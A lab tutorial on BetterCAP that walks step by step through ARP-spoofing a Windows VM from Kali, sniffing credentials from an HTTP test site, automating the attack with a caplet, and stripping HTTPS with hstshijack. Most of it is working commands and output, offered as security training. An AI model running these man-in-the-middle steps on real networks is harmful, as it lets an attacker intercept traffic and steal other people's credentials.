BetterCAP is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
Bettercap Official Documentation: https://www.bettercap.org/intro/
Official Repo: https://github.com/bettercap/bettercap
- Intercept Traffic and sniff out user credentials (HTTP and HTTPS).
- Kali Linux virtual machine (Attacker)
- Any Windows virtual machine (Target)
Launch your Kali Linux, open a new Terminal window and type the following commands:
apt-get update
apt-get install bettercap
To launch the program, type bettercap and specify your current network interface:
bettercap -iface eth0
Type help to list all modules available:
help
The module events.stream is running by default, this module is enabled by default and is responsible for reporting events (logs, new hosts being found, etc) generated by other modules during the interactive session. Moreover, it can be used to programmatically execute commands when specific events occur.
To perform a MITM attack we will use these modules below:
| module | about |
|---|---|
net.probe |
When activated, this module will send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. [+] |
net.recon |
This module is responsible for periodically reading the system ARP table in order to detect new hosts on the network. [+] |
arp.spoof |
This module keeps spoofing selected hosts on the network using crafted ARP packets in order to perform a MITM attack. [+] |
net.sniff |
This module is a network packet sniffer and fuzzer supporting both BPF syntax and regular expressions for filtering. It is also able to dissect several major protocols in order to harvest credentials. [+] |
You can type help following with the module name to grab some details about:
- Start the prober module to send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. (Note: the prober module may start automatically the net.recon module).
net.probe on
10.0.2.0/24 > 10.0.2.42 » net.probe on
10.0.2.0/24 > 10.0.2.42 » [11:43:32] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
10.0.2.0/24 > 10.0.2.42 » [11:43:32] [endpoint.new] endpoint 10.0.2.3 detected as 07:00:27:11:6c:7d .
10.0.2.0/24 > 10.0.2.42 » [11:43:33] [endpoint.new] endpoint 10.0.2.43 detected as 07:00:27:81:d6:f2 .
In my lab, the 10.0.2.43 is my Windows virtual machine, this may differ from your virtual environment.
- Start network hosts discovery:
net.recon on
- Note: you can type
net.showto view all the connected clients viewing the IP addresses and MAC addresses.
-
Set the arp.spoof module option fullduplex to true. When you set to true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail).
set arp.spoof.fullduplex true -
Specify the target to spoof. (A comma separated list of MAC addresses, IP addresses, IP ranges or aliases to spoof).
set arp.spoof.targets 10.0.2.43 -
Start ARP spoofer:
arp.spoof on
10.0.2.0/24 > 10.0.2.42 » [12:03:58] [sys.log] [inf] arp.spoof enabling forwarding
10.0.2.0/24 > 10.0.2.42 » [12:03:58] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
10.0.2.0/24 > 10.0.2.42 » [12:03:58] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
-
Start the packet sniffer:
net.sniff on -
Type
helpto list the modules running:
Bettercap is fooling the router and the target machine(Windows), putting the attacker machine(Kali) on the middle of the connection.
On my Windows machine, I will use the arp table command to see what is going on:
As you can see, the Windows machine 'thinks' the router MAC address is the same as the Kali since the ARP table is spoofed.
- Log into your Windows virtual machine.
- Launch the browser and type the URL: http://testhtml5.vulnweb.com
- Login into this vulnerable-testing-website with sample credentials: user: admin | password: password.
- Back to your Bettercap on Kali machine and analyze all the requests sent from the Windows.
As you can see, we captured the credentials sent to the website. Anything that the target machine sent and received will be captured by Kali Linux machine.
Note: this technique works on HTTP websites not HTTPS. To perform such action you need to bypass the HSTS (HTTP Strict Transport Security). You can perform this technique using Bettercap and hstshijack caplet.
To be more efficient on your work, you can automate the modules setup by creating a simple Caplet file(file.cap) and adding the commands per line.
-
Create the caplet:
touch spoof.cap -
Add the commands and save it :
nano spoof.cap
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.5
arp.spoof on
set net.sniff.local true
net.sniff onAs you can see is the same commands in order that you used previously.
- Start the Bettercap using the spoof Caplet that you created:
bettercap -iface eth0 -caplet spoof.cap
This module injects HTML & JS files with a payload that spoofs your targeted hostnames and communicates with bettercap, revealing all URLs that were discovered in the injected document.
When bettercap receives a callback with a new URL, it sends a HEAD request to learn whether the host in this URL sends HTTPS redirects, and keeps a log.
This is done so that bettercap can know whether it should MITM an SSL connection with a host, before the victim navigates to it.
BetterCAP comes with hstshijack by default.
Official hstshijack repo: https://github.com/bettercap/caplets/blob/master/hstshijack/README.md
My custom hstshijack with spoof caplet: https://github.com/Samsar4/Caplets
Note: This method in default payloads doesn't work on a few popular websites like Twitter or Facebook, since the modern browsers have a security measure hardcoded on for those websites. But it works in a majority websites that is using HTTPS.
-
Create a caplet called spoof.cap
-
Add those parameters (remember to put the target IP address on arp.spoof.targets):
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <TARGET IP ADDRESS >
arp.spoof on
set net.sniff.local true
net.sniff on-
In the same folder that you created the caplet, start the BetterCAP using the spoof.cap Caplet that you created:
bettercap -iface eth0 -caplet spoof.cap -
On BetterCAP, launch the hstshijack:
hstshijack/hstshijack
-
Switchback to the Windows and open the browser.
-
On this lab we will test the popular StackOverflow, type the URL: stackoverflow.com and hit enter.
As you can see the HTTPS is sucessfully bypassed and the entire website is loaded. -
Try to login in with fake account to test it.
-
After you submited the fake credentials, switch back to BetterCAP on Kali Linux and try to find the method POST sniffed from BetterCAP, you will find the credentials typed, as shown below:
